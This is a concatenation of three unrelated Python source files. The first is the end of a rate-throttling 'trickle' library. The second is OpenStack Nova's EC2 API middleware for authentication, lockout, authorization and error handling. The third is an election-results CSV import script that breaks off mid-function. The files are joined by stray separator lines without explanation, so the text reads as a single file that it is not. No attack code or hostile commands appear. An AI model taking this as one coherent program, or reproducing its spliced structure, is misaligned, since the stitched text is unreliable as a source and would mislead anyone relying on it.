          n: How many queries may be run in a batch.  Values above 1000000 are
            probably ill-advised.
        """
        self._batch_size_limit = n

    def Trickle(self):
        """Perform the actual trickle operation.

        This function will loop until self._Finished() returns true.  It
        calls the above methods in this order:
          self._SetupTrickle()
          while not self._Finished():
            ...
            self._PerformTrickle(self, batch_size)
            ...
          self._FinalizeTrickle()
        """
        self._SetupTrickle()
        # track the last ten cycles worth of copy rates
        copy_rates = [0] * 10
        copy_rate_idx = 0
        # also track average copies over this invocation's lifetime
        rows_copied = 0
        start_time = time.time()
        while not self._Finished():
            then = time.time()
            batch_size = self._batch_size
            rowcount = self._PerformTrickle(batch_size)
            # Increase or decrease batch size to get the target utilization
            # percentage at the given cycle time.  At all times, we're cautious
            # about floating point rounding effects and the like.
            time_delta = time.time() - then
            ideal_delta = self._cycle_time * self._utilization_fraction
            if time_delta > 2.0 * ideal_delta:
                # If our utilization fraction is way too high, we want to
                # decrease our batch size fairly drastically, but we don't want
                # to chop things to nothing in case what we saw was a transient
                # blip.  Note that if we get here, either (a) we've seen enough
                # short statements to increase our batch size from its initial
                # value of 1 before hitting this, or (b) a batch size of 1 is
                # still way too big, in which case we modulate cycle time below
                # instead.
                self._batch_size = max(int(batch_size/2), 1)
            elif time_delta * 1.5 < ideal_delta:
                # We don't want to increase batch size quite as drastically
                # (batch_size + 1 guarantees forward progress for tiny sizes).
                self._batch_size = max(int(batch_size * 1.5), batch_size + 1)
            else:
                # batch_size is between 2x and 0.67x target.  Modulate it
                # directly to the target value.
                self._batch_size = max(int(batch_size * ideal_delta / time_delta), 1)
            # Rev limiter in case an operation is a no-op by accident.
            self._batch_size = min(self._batch_size, self._batch_size_limit)
            # How long are we going to sleep this time?  At least the rest of
            # the cycle time, longer if utilization would otherwise be too
            # high, and at least one second regardless but no more than 2x the
            # cycle time.
            if self._utilization_fraction < 1.0:
                sleep_time = min(
                    max(self._cycle_time - time_delta,
                        (time_delta / self._utilization_fraction) - time_delta,
                        1),
                    2 * self._cycle_time)
            else:
                # But if running with 100% utilization, don't sleep at all.
                sleep_time = 0.0
            # update average copy rate
            # NOTE(review): the rate is computed from batch_size, not the
            # rowcount actually processed — a final short batch is
            # over-counted; confirm this is intentional.
            this_batch_rate = batch_size / (sleep_time + time_delta)
            copy_rates[copy_rate_idx] = this_batch_rate
            copy_rate_idx = (copy_rate_idx + 1) % len(copy_rates)
            current_rate_avg = sum(copy_rates) / float(len(copy_rates))
            rows_copied += rowcount
            if self.verbose:
                self._LogStatus(batch_size, start_time, time_delta, sleep_time,
                                current_rate_avg, rows_copied, copy_rate_idx)
            time.sleep(sleep_time)
        if self.verbose:
            self._LogFinish(rows_copied, start_time)
        self._FinalizeTrickle()

    def _LogStatus(self, batch_size, start_time, time_delta, sleep_time,
                   current_rate_avg, rows_copied, copy_rate_idx):
        # Per-cycle progress line.  Note copy_rate_idx is accepted but unused.
        progress = self._GetProgress()
        if progress:
            progress = ', ' + progress
        else:
            progress = ''
        logging.info('batch of %d in %.2f s%s, sleeping %.2f s'
                     % (batch_size, time_delta, progress, sleep_time))
        logging.info('util %.2f, new batch size %d '
                     '(%.2f current, %.2f avg rows/sec)'
                     % (time_delta / (time_delta + sleep_time),
                        self._batch_size,
                        current_rate_avg,
                        rows_copied / (time.time() - start_time)))

    def _LogFinish(self, rows_copied, start_time):
        # Final summary once the trickle loop has completed.
        logging.info('Done: %.2f avg rows/sec',
                     (rows_copied / (time.time() - start_time)))
class GeneratorOperation(TrickledOperation):
    """Adapts blocking functions so they can run within trickle_lib.

    The adapter only requires that users insert a 'yield' statement after
    each entry in the batch has been processed.
    """

    def __init__(self, generator, utilization_percent, cycle_time):
        """Constructor.

        Args:
          generator: an iterator/generator that performs one unit of work
            each time it is advanced.
          utilization_percent: An int, percent of time to spend in
            _PerformTrickle.
          cycle_time: interval over which utilization_percent is
            calculated per run
        """
        TrickledOperation.__init__(self, utilization_percent, cycle_time)
        self._generator = generator
        self._finished = False

    def _SetupTrickle(self):
        """No per-loop setup is needed; the generator owns its own state."""
        pass

    def _FinalizeTrickle(self):
        """No finalization is needed; the generator owns its own state."""
        pass

    def _Finished(self):
        """True once the underlying generator has been exhausted."""
        return self._finished

    def _PerformTrickle(self, batch_size):
        """Advance the generator up to batch_size times.

        Args:
          batch_size: maximum number of generator steps to take this cycle.
        Returns:
          number of items actually processed (less than batch_size only
          when the generator is exhausted mid-batch).
        """
        processed = 0
        try:
            # Use the next() builtin and range() rather than the
            # Python-2-only gen.next() / xrange(), so the adapter works
            # identically under Python 2.6+ and Python 3.
            for _ in range(batch_size):
                next(self._generator)
                processed += 1
        except StopIteration:
            self._finished = True
        return processed
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Starting point for routing EC2 requests.
"""
import urlparse
from eventlet.green import httplib
from oslo.config import cfg
import webob
import webob.dec
import webob.exc
from nova.api.ec2 import apirequest
from nova.api.ec2 import ec2utils
from nova.api.ec2 import faults
from nova.api import validator
from nova import context
from nova import exception
from nova.openstack.common.gettextutils import _
from nova.openstack.common import importutils
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common import memorycache
from nova.openstack.common import timeutils
from nova import utils
from nova import wsgi
LOG = logging.getLogger(__name__)
ec2_opts = [
cfg.IntOpt('lockout_attempts',
default=5,
help='Number of failed auths before lockout.'),
cfg.IntOpt('lockout_minutes',
default=15,
help='Number of minutes to lockout if triggered.'),
cfg.IntOpt('lockout_window',
default=15,
help='Number of minutes for lockout window.'),
cfg.StrOpt('keystone_ec2_url',
default='http://localhost:5000/v2.0/ec2tokens',
help='URL to get token from ec2 request.'),
cfg.BoolOpt('ec2_private_dns_show_ip',
default=False,
help='Return the IP address as private dns hostname in '
'describe instances'),
cfg.BoolOpt('ec2_strict_validation',
default=True,
help='Validate security group names'
' according to EC2 specification'),
cfg.IntOpt('ec2_timestamp_expiry',
default=300,
help='Time in seconds before ec2 timestamp expires'),
]
CONF = cfg.CONF
CONF.register_opts(ec2_opts)
CONF.import_opt('use_forwarded_for', 'nova.api.auth')
## Fault Wrapper around all EC2 requests ##
class FaultWrapper(wsgi.Middleware):
    """Outermost EC2 middleware: convert uncaught exceptions into faults.

    Delegates to the wrapped application; any exception that escapes it is
    logged and turned into an EC2 fault carrying a 500 response instead of
    propagating up the WSGI stack.
    """

    @webob.dec.wsgify(RequestClass=wsgi.Request)
    def __call__(self, req):
        try:
            return req.get_response(self.application)
        except Exception as error:
            LOG.exception(_("FaultWrapper: %s"), unicode(error))
            return faults.Fault(webob.exc.HTTPInternalServerError())
class RequestLogging(wsgi.Middleware):
    """Access-log style logging for every EC2 API request."""

    @webob.dec.wsgify(RequestClass=wsgi.Request)
    def __call__(self, req):
        started_at = timeutils.utcnow()
        response = req.get_response(self.application)
        self.log_request_completion(response, req, started_at)
        return response

    def log_request_completion(self, response, request, start):
        """Emit one access-log line describing the finished request."""
        apireq = request.environ.get('ec2.request')
        controller = apireq.controller if apireq else None
        action = apireq.action if apireq else None
        ctxt = request.environ.get('nova.context')
        delta = timeutils.utcnow() - start
        LOG.info(
            "%s.%ss %s %s %s %s:%s %s [%s] %s %s",
            delta.seconds,
            delta.microseconds,
            request.remote_addr,
            request.method,
            "%s%s" % (request.script_name, request.path_info),
            controller,
            action,
            response.status_int,
            request.user_agent,
            request.content_type,
            response.content_type,
            context=ctxt)
class Lockout(wsgi.Middleware):
    """Temporarily block an access key after repeated failed auths.

    A key is locked out for lockout_minutes once it accumulates
    lockout_attempts 403 responses inside a lockout_window-minute span.
    Failure counters live in memcached when lockout_memcached_servers is
    set, otherwise in a simple in-process cache; the window starts at the
    first failure.  Simultaneous requests may slip through just before the
    lockout engages, but that only costs a couple of extra failed attempts.
    """

    def __init__(self, application):
        """middleware can use fake for testing."""
        self.mc = memorycache.get_client()
        super(Lockout, self).__init__(application)

    @webob.dec.wsgify(RequestClass=wsgi.Request)
    def __call__(self, req):
        access_key = str(req.params['AWSAccessKeyId'])
        failures_key = "authfailures-%s" % access_key
        auth_failures = int(self.mc.get(failures_key) or 0)
        if auth_failures >= CONF.lockout_attempts:
            detail = _("Too many failed authentications.")
            raise webob.exc.HTTPForbidden(detail=detail)
        response = req.get_response(self.application)
        if response.status_int == 403:
            auth_failures = self.mc.incr(failures_key)
            if auth_failures is None:
                # NOTE(vish): To use incr, failures has to be a string.
                self.mc.set(failures_key, '1', time=CONF.lockout_window * 60)
            elif auth_failures >= CONF.lockout_attempts:
                LOG.warn(_('Access key %(access_key)s has had %(failures)d '
                           'failed authentications and will be locked out '
                           'for %(lock_mins)d minutes.'),
                         {'access_key': access_key,
                          'failures': auth_failures,
                          'lock_mins': CONF.lockout_minutes})
                self.mc.set(failures_key, str(auth_failures),
                            time=CONF.lockout_minutes * 60)
        return response
class EC2KeystoneAuth(wsgi.Middleware):
    """Authenticate an EC2 request with keystone and convert to context."""

    @webob.dec.wsgify(RequestClass=wsgi.Request)
    def __call__(self, req):
        # Generate a request id up front so auth failures can be reported
        # even before a RequestContext exists.
        request_id = context.generate_request_id()
        signature = req.params.get('Signature')
        if not signature:
            msg = _("Signature not provided")
            return faults.ec2_error_response(request_id, "Unauthorized", msg,
                                             status=400)
        access = req.params.get('AWSAccessKeyId')
        if not access:
            msg = _("Access key not provided")
            return faults.ec2_error_response(request_id, "Unauthorized", msg,
                                             status=400)
        # Make a copy of args for authentication and signature verification.
        auth_params = dict(req.params)
        # Not part of authentication args
        auth_params.pop('Signature')
        # Keystone recomputes the signature over these request components.
        cred_dict = {
            'access': access,
            'signature': signature,
            'host': req.host,
            'verb': req.method,
            'path': req.path,
            'params': auth_params,
        }
        # The payload shape depends on the endpoint: URLs containing "ec2"
        # take the credentials at the top level, otherwise they are nested
        # under the OS-KSEC2 auth extension.
        if "ec2" in CONF.keystone_ec2_url:
            creds = {'ec2Credentials': cred_dict}
        else:
            creds = {'auth': {'OS-KSEC2:ec2Credentials': cred_dict}}
        creds_json = jsonutils.dumps(creds)
        headers = {'Content-Type': 'application/json'}
        # POST the credentials to keystone for verification (eventlet green
        # httplib, so only the current greenthread blocks).
        o = urlparse.urlparse(CONF.keystone_ec2_url)
        if o.scheme == "http":
            conn = httplib.HTTPConnection(o.netloc)
        else:
            conn = httplib.HTTPSConnection(o.netloc)
        conn.request('POST', o.path, body=creds_json, headers=headers)
        response = conn.getresponse()
        data = response.read()
        if response.status != 200:
            if response.status == 401:
                msg = response.reason
            else:
                msg = _("Failure communicating with keystone")
            # NOTE(review): the connection is not closed on this error
            # path; only the success path below calls conn.close().
            return faults.ec2_error_response(request_id, "Unauthorized", msg,
                                             status=400)
        result = jsonutils.loads(data)
        conn.close()
        try:
            # Extract identity details from keystone's token response.
            token_id = result['access']['token']['id']
            user_id = result['access']['user']['id']
            project_id = result['access']['token']['tenant']['id']
            user_name = result['access']['user'].get('name')
            project_name = result['access']['token']['tenant'].get('name')
            roles = [role['name'] for role
                     in result['access']['user']['roles']]
        except (AttributeError, KeyError) as e:
            LOG.exception(_("Keystone failure: %s") % e)
            msg = _("Failure communicating with keystone")
            return faults.ec2_error_response(request_id, "Unauthorized", msg,
                                             status=400)
        remote_address = req.remote_addr
        if CONF.use_forwarded_for:
            # Trust the proxy/load balancer's forwarded address if enabled.
            remote_address = req.headers.get('X-Forwarded-For',
                                             remote_address)
        catalog = result['access']['serviceCatalog']
        ctxt = context.RequestContext(user_id,
                                      project_id,
                                      user_name=user_name,
                                      project_name=project_name,
                                      roles=roles,
                                      auth_token=token_id,
                                      remote_address=remote_address,
                                      service_catalog=catalog)
        # Downstream middleware reads the authenticated context from here.
        req.environ['nova.context'] = ctxt
        return self.application
class NoAuth(wsgi.Middleware):
    """Fake-auth middleware: derive an admin context from the access key.

    The AWSAccessKeyId parameter is interpreted as 'user:project' (project
    defaulting to the user) and the resulting admin RequestContext is
    stored as 'nova.context' in the WSGI environ.
    """

    @webob.dec.wsgify(RequestClass=wsgi.Request)
    def __call__(self, req):
        if 'AWSAccessKeyId' not in req.params:
            raise webob.exc.HTTPBadRequest()
        user_id, _sep, project_id = req.params['AWSAccessKeyId'].partition(':')
        if not project_id:
            project_id = user_id
        remote_address = req.remote_addr
        if CONF.use_forwarded_for:
            remote_address = req.headers.get('X-Forwarded-For', remote_address)
        req.environ['nova.context'] = context.RequestContext(
            user_id,
            project_id,
            is_admin=True,
            remote_address=remote_address)
        return self.application
class Requestify(wsgi.Middleware):
    """Convert a validated EC2 query request into an APIRequest object.

    Strips the authentication/protocol parameters from the query string,
    builds an apirequest.APIRequest for the named Action, and stashes it
    in the WSGI environ under 'ec2.request' for downstream middleware.
    """

    def __init__(self, app, controller):
        super(Requestify, self).__init__(app)
        # The controller is named by dotted path so deployments can swap
        # implementations via configuration.
        self.controller = importutils.import_object(controller)

    @webob.dec.wsgify(RequestClass=wsgi.Request)
    def __call__(self, req):
        # Protocol-level parameters that are not arguments to the API call.
        non_args = ['Action', 'Signature', 'AWSAccessKeyId', 'SignatureMethod',
                    'SignatureVersion', 'Version', 'Timestamp']
        args = dict(req.params)
        try:
            expired = ec2utils.is_ec2_timestamp_expired(req.params,
                                expires=CONF.ec2_timestamp_expiry)
            if expired:
                msg = _("Timestamp failed validation.")
                # Use LOG.error, not LOG.exception: no exception is in
                # flight here, so LOG.exception would attach a meaningless
                # "None" traceback to the log record.
                LOG.error(msg)
                raise webob.exc.HTTPForbidden(detail=msg)
            # Raise KeyError if omitted
            action = req.params['Action']
            # Fix bug lp:720157 for older (version 1) clients
            version = req.params['SignatureVersion']
            if int(version) == 1:
                non_args.remove('SignatureMethod')
                if 'SignatureMethod' in args:
                    args.pop('SignatureMethod')
            for non_arg in non_args:
                # Remove, but raise KeyError if omitted
                args.pop(non_arg)
        except KeyError:
            raise webob.exc.HTTPBadRequest()
        except exception.InvalidRequest as err:
            raise webob.exc.HTTPBadRequest(explanation=unicode(err))
        LOG.debug(_('action: %s'), action)
        for key, value in args.items():
            LOG.debug(_('arg: %(key)s\t\tval: %(value)s'),
                      {'key': key, 'value': value})
        # Success!
        api_request = apirequest.APIRequest(self.controller, action,
                                            req.params['Version'], args)
        req.environ['ec2.request'] = api_request
        return self.application
class Authorizer(wsgi.Middleware):
    """Authorize an EC2 API request.

    Return a 401 if ec2.controller and ec2.action in WSGI environ may not be
    executed in nova.context.
    """

    def __init__(self, application):
        super(Authorizer, self).__init__(application)
        # Static policy map: controller name -> {action -> allowed roles}.
        # 'all' means any authenticated user; an action absent from the map
        # defaults to ['none'], i.e. admin-only.
        self.action_roles = {
            'CloudController': {
                'DescribeAvailabilityZones': ['all'],
                'DescribeRegions': ['all'],
                'DescribeSnapshots': ['all'],
                'DescribeKeyPairs': ['all'],
                'CreateKeyPair': ['all'],
                'DeleteKeyPair': ['all'],
                'DescribeSecurityGroups': ['all'],
                'ImportKeyPair': ['all'],
                'AuthorizeSecurityGroupIngress': ['netadmin'],
                'RevokeSecurityGroupIngress': ['netadmin'],
                'CreateSecurityGroup': ['netadmin'],
                'DeleteSecurityGroup': ['netadmin'],
                'GetConsoleOutput': ['projectmanager', 'sysadmin'],
                'DescribeVolumes': ['projectmanager', 'sysadmin'],
                'CreateVolume': ['projectmanager', 'sysadmin'],
                'AttachVolume': ['projectmanager', 'sysadmin'],
                'DetachVolume': ['projectmanager', 'sysadmin'],
                'DescribeInstances': ['all'],
                'DescribeAddresses': ['all'],
                'AllocateAddress': ['netadmin'],
                'ReleaseAddress': ['netadmin'],
                'AssociateAddress': ['netadmin'],
                'DisassociateAddress': ['netadmin'],
                'RunInstances': ['projectmanager', 'sysadmin'],
                'TerminateInstances': ['projectmanager', 'sysadmin'],
                'RebootInstances': ['projectmanager', 'sysadmin'],
                'UpdateInstance': ['projectmanager', 'sysadmin'],
                'StartInstances': ['projectmanager', 'sysadmin'],
                'StopInstances': ['projectmanager', 'sysadmin'],
                'DeleteVolume': ['projectmanager', 'sysadmin'],
                'DescribeImages': ['all'],
                'DeregisterImage': ['projectmanager', 'sysadmin'],
                'RegisterImage': ['projectmanager', 'sysadmin'],
                'DescribeImageAttribute': ['all'],
                'ModifyImageAttribute': ['projectmanager', 'sysadmin'],
                'UpdateImage': ['projectmanager', 'sysadmin'],
                'CreateImage': ['projectmanager', 'sysadmin'],
            },
            'AdminController': {
                # All actions have the same permission: ['none'] (the default)
                # superusers will be allowed to run them
                # all others will get HTTPUnauthorized.
            },
        }

    @webob.dec.wsgify(RequestClass=wsgi.Request)
    def __call__(self, req):
        # Both keys are populated by upstream middleware (auth + Requestify).
        context = req.environ['nova.context']
        controller = req.environ['ec2.request'].controller.__class__.__name__
        action = req.environ['ec2.request'].action
        allowed_roles = self.action_roles[controller].get(action, ['none'])
        if self._matches_any_role(context, allowed_roles):
            return self.application
        else:
            LOG.audit(_('Unauthorized request for controller=%(controller)s '
                        'and action=%(action)s'),
                      {'controller': controller, 'action': action},
                      context=context)
            raise webob.exc.HTTPUnauthorized()

    def _matches_any_role(self, context, roles):
        """Return True if any role in roles is allowed in context."""
        # Admin bypasses the policy map entirely; 'none' blocks everyone
        # else regardless of their roles.
        if context.is_admin:
            return True
        if 'all' in roles:
            return True
        if 'none' in roles:
            return False
        return any(role in context.roles for role in roles)
class Validator(wsgi.Middleware):
    # NOTE: the statements below execute once, at class-definition time.
    # They define an EC2-id validator and install it — plus the default
    # validator map — onto the shared `validator` module, for use by
    # validator.validate() in __call__.
    def validate_ec2_id(val):
        # Plain function (no self): it is attached to the validator module
        # below, not used as a bound method.  Valid when the value is a
        # string and parses as an EC2 id.
        if not validator.validate_str()(val):
            return False
        try:
            ec2utils.ec2_id_to_id(val)
        except exception.InvalidEc2Id:
            return False
        return True

    validator.validate_ec2_id = validate_ec2_id

    # Maps request-argument names to the callable that validates them.
    validator.DEFAULT_VALIDATOR = {
        'instance_id': validator.validate_ec2_id,
        'volume_id': validator.validate_ec2_id,
        'image_id': validator.validate_ec2_id,
        'attribute': validator.validate_str(),
        'image_location': validator.validate_image_path,
        'public_ip': utils.is_valid_ipv4,
        'region_name': validator.validate_str(),
        'group_name': validator.validate_str(max_length=255),
        'group_description': validator.validate_str(max_length=255),
        'size': validator.validate_int(),
        'user_data': validator.validate_user_data
    }

    def __init__(self, application):
        super(Validator, self).__init__(application)

    @webob.dec.wsgify(RequestClass=wsgi.Request)
    def __call__(self, req):
        # Reject the request unless every recognized argument passes its
        # validator from the map installed above.
        if validator.validate(req.environ['ec2.request'].args,
                              validator.DEFAULT_VALIDATOR):
            return self.application
        else:
            raise webob.exc.HTTPBadRequest()
def exception_to_ec2code(ex):
    """Map an exception to its EC2 error code string.

    EC2-aware exceptions carry the code in an ``ec2_code`` attribute;
    any other exception falls back to its class name.
    """
    if hasattr(ex, 'ec2_code'):
        return ex.ec2_code
    return type(ex).__name__
def ec2_error_ex(ex, req, code=None, message=None, unexpected=False):
    """
    Return an EC2 error response based on passed exception and log
    the exception on an appropriate log level:

      * DEBUG: expected errors
      * ERROR: unexpected client (4xx) errors
      * CRITICAL: unexpected server (5xx) errors

    Unexpected 5xx errors may contain sensitive information,
    suppress their messages for security.
    """
    if not code:
        code = exception_to_ec2code(ex)
    # 'code' on the exception is its HTTP status, defaulting to 500.
    status = getattr(ex, 'code', None)
    if not status:
        status = 500
    # Pick log level and message template based on whether the error was
    # expected and whether the exception carries arguments.
    if unexpected:
        log_msg = _("Unexpected %(ex_name)s raised")
        if status >= 500:
            log_fun = LOG.critical
        else:
            log_fun = LOG.error
        if ex.args:
            log_msg = _("Unexpected %(ex_name)s raised: %(ex_str)s")
    else:
        log_fun = LOG.debug
        if ex.args:
            log_msg = _("%(ex_name)s raised: %(ex_str)s")
        else:
            log_msg = _("%(ex_name)s raised")
    context = req.environ['nova.context']
    request_id = context.request_id
    log_msg_args = {
        'ex_name': type(ex).__name__,
        'ex_str': unicode(ex)  # Python 2 text type
    }
    log_fun(log_msg % log_msg_args, context=context)
    # Only expose the exception text to the client for expected errors or
    # unexpected client-side (4xx) errors; unexpected 5xx stay opaque.
    if ex.args and not message and (not unexpected or status < 500):
        message = unicode(ex.args[0])
    if unexpected:
        # Log filtered environment for unexpected errors.
        env = req.environ.copy()
        # NOTE(review): popping while iterating env.keys() is safe on
        # Python 2 only, where keys() returns a list snapshot.
        for k in env.keys():
            if not isinstance(env[k], basestring):
                env.pop(k)
        log_fun(_('Environment: %s') % jsonutils.dumps(env))
    if not message:
        message = _('Unknown error occured.')
    # note(jruzicka): To preserve old behavior, all exceptions are returned
    # with 400 status until EC2 errors are properly fixed.
    return faults.ec2_error_response(request_id, code, message, status=400)
class Executor(wsgi.Application):
    """Execute an EC2 API request.

    Executes 'ec2.action' upon 'ec2.controller', passing 'nova.context' and
    'ec2.action_args' (all variables in WSGI environ.)  Returns an XML
    response, or a 400 upon failure.
    """

    @webob.dec.wsgify(RequestClass=wsgi.Request)
    def __call__(self, req):
        context = req.environ['nova.context']
        api_request = req.environ['ec2.request']
        result = None
        try:
            result = api_request.invoke(context)
        except exception.InstanceNotFound as ex:
            # Translate the internal id into its EC2 form before echoing
            # it back to the client (same pattern for volume/snapshot).
            ec2_id = ec2utils.id_to_ec2_inst_id(ex.kwargs['instance_id'])
            message = ex.msg_fmt % {'instance_id': ec2_id}
            return ec2_error_ex(ex, req, message=message)
        except exception.VolumeNotFound as ex:
            ec2_id = ec2utils.id_to_ec2_vol_id(ex.kwargs['volume_id'])
            message = ex.msg_fmt % {'volume_id': ec2_id}
            return ec2_error_ex(ex, req, message=message)
        except exception.SnapshotNotFound as ex:
            ec2_id = ec2utils.id_to_ec2_snap_id(ex.kwargs['snapshot_id'])
            message = ex.msg_fmt % {'snapshot_id': ec2_id}
            return ec2_error_ex(ex, req, message=message)
        except exception.KeyPairExists as ex:
            # Map keypair errors onto their official EC2 error codes.
            code = 'InvalidKeyPair.Duplicate'
            return ec2_error_ex(ex, req, code=code)
        except exception.InvalidKeypair as ex:
            code = 'InvalidKeyPair.Format'
            return ec2_error_ex(ex, req, code=code)
        except (exception.EC2APIError,
                exception.NotFound,
                exception.InvalidParameterValue,
                exception.InvalidPortRange,
                exception.NotAuthorized,
                exception.InvalidRequest,
                exception.QuotaError,
                exception.InvalidInstanceIDMalformed) as ex:
            # Expected client errors: return the EC2 error response as-is.
            return ec2_error_ex(ex, req)
        except Exception as ex:
            # Anything else is unexpected: log loudly and hide the details.
            return ec2_error_ex(ex, req, unexpected=True)
        else:
            # Success path: the controller result is serialized as XML text.
            resp = webob.Response()
            resp.status = 200
            resp.headers['Content-Type'] = 'text/xml'
            resp.body = str(result)
            return resp
| |
# coding: utf-8
import dataset
import csv
import os
# For simulation of results
import random
from default_settings import DB_RESULTS_URL
# Database handle; module-global, populated elsewhere (see connect_dataset).
db = None

# Base directory of this module; the data paths below are resolved relative
# to it.  Renamed from `dir`, which shadowed the `dir` builtin.
_BASE_DIR = os.path.dirname(__file__)
CABA_DATADICT_PATH = os.path.join(_BASE_DIR, '../data/caba/auxiliares')
CABA_RESULTS_PATH = os.path.join(_BASE_DIR, '../data/caba/resultados')
PASO_DATADICT_PATH = os.path.join(_BASE_DIR, '../data/paso/auxiliares')
PASO_RESULTS_PATH = os.path.join(_BASE_DIR, '../data/paso/resultados')
GEO_DATADICT_PATH = os.path.join(_BASE_DIR, '../data/geo')

# Input CSV file names.
POLLING_STATIONS_DATA_FILE = 'establecimientos_geo.csv'
POLLING_TABLES_DATA_FILE = 'mesas_final.csv'
CIRCUITS_DATA_FILE = 'circuitos.csv'
LISTS_DATA_FILE = 'listas_final.csv'
PARTIES_DATA_FILE = 'partidos_final.csv'
RESULTS_DATA_FILE = 'resultados_mesa.csv'

# CSV-column -> DB-column maps.  Columns listed here are renamed and cast
# to int on import; every other column is stored as (decoded) text.
SCHEMA_POLLING_STATION_NUMERIC = {
    "id_establecimiento": "id_establecimiento",
    "id_comuna": "id_comuna",
    "ciudadanos_habilitados": "electores"
}
SCHEMA_POLLING_TABLE_NUMERIC = {
    "id_mesa": "id_mesa",
    "id_establecimiento": "id_establecimiento",
    "id_circuito": "id_circuito",
    "ciudadanos_habilitados": "electores",
    "id_barrio": "id_barrio",
    "id_comuna": "id_comuna"
}
SCHEMA_PASO_LISTS_NUMERIC = {
    "especial": "especial"
}
SCHEMA_PASO_PARTIES_NUMERIC = {
    "especial": "especial"
}
SCHEMA_CABA_LISTS_NUMERIC = {
    "especial": "especial"
}
SCHEMA_RESULTS_NUMERIC = {
    "id_mesa": "id_mesa",
    "cantidad_votantes": "electores",
    "sobres_utilizados": "votantes",
    "JEF": "votos",
    "LEG": "votos_leg",
    "COM": "votos_com"
}
SCHEMA_RESULTS_CABA_NUMERIC = {
    "id_mesa": "id_mesa",
    "ciudadanos_habilitados": "electores",
    "id_establecimiento": "id_establecimiento",
    "id_comuna": "id_comuna",
    "VotosJef": "votos",
    "VotosLeg": "votos_leg",
    "VotosCom": "votos_com"
}

# Special (non-party) vote codes: BLC=blank, NUL=null, IMP=impugned,
# REC=appealed, TEC=technical.  NOTE(review): the 0/1 values presumably
# flag whether the code counts as an invalid vote — confirm, as this map
# is not referenced by the visible import code.
SPECIAL_PARTIES = {
    "BLC": 0,
    "NUL": 1,
    "IMP": 1,
    "REC": 1,
    "TEC": 1
}
def randomized_int_by_perc(value=None, change=1):
    '''Perturb an integer by a random percentage-based offset.

    When value is large enough for a one-percent step, the offset is drawn
    from +/- (change percent of value); otherwise a small absolute offset
    of +/-5 is used.  The result is clamped so it is never negative.
    '''
    step = int(value / 100)
    if step:
        delta = random.randint(-(change * step), change * step)
    else:
        delta = random.randint(-5, 5)
    shifted = value + delta
    return shifted if shifted >= 0 else 0
def connect_dataset():
    '''Open and return a dataset connection to the results database.'''
    return dataset.connect(DB_RESULTS_URL)
def recreateDB():
    ''' Clears the DB to make the script idempotent '''
    # Drop every existing table so repeated imports start from a clean slate.
    for t in db.tables:
        # Parenthesized print works identically under Python 2 and 3
        # (the original bare `print t` statement is Python-2-only syntax).
        print(t)
        db.get_table(t).drop()
def import_poll_stations(fname):
    ''' import geolocated polling stations'''
    table = db.create_table('establecimientos',
                            primary_id='id_establecimiento',
                            primary_type='Integer')
    handle = open(fname, 'r')
    # First line is the header: strip quotes, split into column names.
    header = handle.readline().replace("\"", "").strip().split(',')
    reader = csv.DictReader(handle, header)
    rows = []
    for record in reader:
        converted = {}
        for column, raw in record.iteritems():
            if column in SCHEMA_POLLING_STATION_NUMERIC:
                target = SCHEMA_POLLING_STATION_NUMERIC[column]
                converted[target] = int(raw) if raw else None
            elif column == "geom":
                # Geometry value is passed through unchanged (no decode).
                converted[column] = raw
            else:
                converted[column] = raw.decode('utf-8')
        rows.append(converted)
    table.insert_many(rows)
def import_poll_tables(fname):
    ''' import polling tables CSV '''
    table = db.create_table('mesas',
                            primary_id='id_mesa',
                            primary_type='Integer')
    handle = open(fname, 'r')
    # First line is the header: strip quotes, split into column names.
    header = handle.readline().replace("\"", "").strip().split(',')
    reader = csv.DictReader(handle, header)
    rows = []
    for record in reader:
        converted = {}
        for column, raw in record.iteritems():
            if column in SCHEMA_POLLING_TABLE_NUMERIC:
                target = SCHEMA_POLLING_TABLE_NUMERIC[column]
                converted[target] = int(raw) if raw else None
            else:
                converted[column] = raw.decode('utf-8')
        rows.append(converted)
    table.insert_many(rows, chunk_size=1000)
def paso_import_lists(fname):
    ''' import lists CSV '''
    table = db.create_table('listas_paso',
                            primary_id='id_lista',
                            primary_type='String(3)')
    handle = open(fname, 'r')
    # First line is the header: strip quotes, split into column names.
    header = handle.readline().replace("\"", "").strip().split(',')
    reader = csv.DictReader(handle, header)
    rows = []
    for record in reader:
        converted = {}
        for column, raw in record.iteritems():
            if column in SCHEMA_PASO_LISTS_NUMERIC:
                target = SCHEMA_PASO_LISTS_NUMERIC[column]
                converted[target] = int(raw) if raw else None
            else:
                converted[column] = raw.decode('utf-8')
        rows.append(converted)
    table.insert_many(rows)
def paso_import_parties(fname):
    ''' import political parties CSV '''
    table = db.create_table('partidos_paso',
                            primary_id='id_partido',
                            primary_type='String(3)')
    handle = open(fname, 'r')
    # First line is the header: strip quotes, split into column names.
    header = handle.readline().replace("\"", "").strip().split(',')
    reader = csv.DictReader(handle, header)
    rows = []
    for record in reader:
        converted = {}
        for column, raw in record.iteritems():
            if column in SCHEMA_PASO_PARTIES_NUMERIC:
                target = SCHEMA_PASO_PARTIES_NUMERIC[column]
                converted[target] = int(raw) if raw else None
            else:
                converted[column] = raw.decode('utf-8')
        rows.append(converted)
    table.insert_many(rows)
def paso_import_results(fname):
    ''' import results by polling table CSV '''
    # Plain table lookup (no explicit primary key), unlike the dictionaries.
    table = db['resultados_paso']
    handle = open(fname, 'r')
    # First line is the header: strip quotes, split into column names.
    header = handle.readline().replace("\"", "").strip().split(',')
    reader = csv.DictReader(handle, header)
    rows = []
    for record in reader:
        converted = {}
        for column, raw in record.iteritems():
            if column in SCHEMA_RESULTS_NUMERIC:
                target = SCHEMA_RESULTS_NUMERIC[column]
                converted[target] = int(raw) if raw else None
            else:
                converted[column] = raw.decode('utf-8')
        rows.append(converted)
    table.insert_many(rows, chunk_size=50000)
def paso_results_by_poll_station_party():
    '''Aggregate PASO votes per polling station and party into a cache
    table.'''
    q = '''
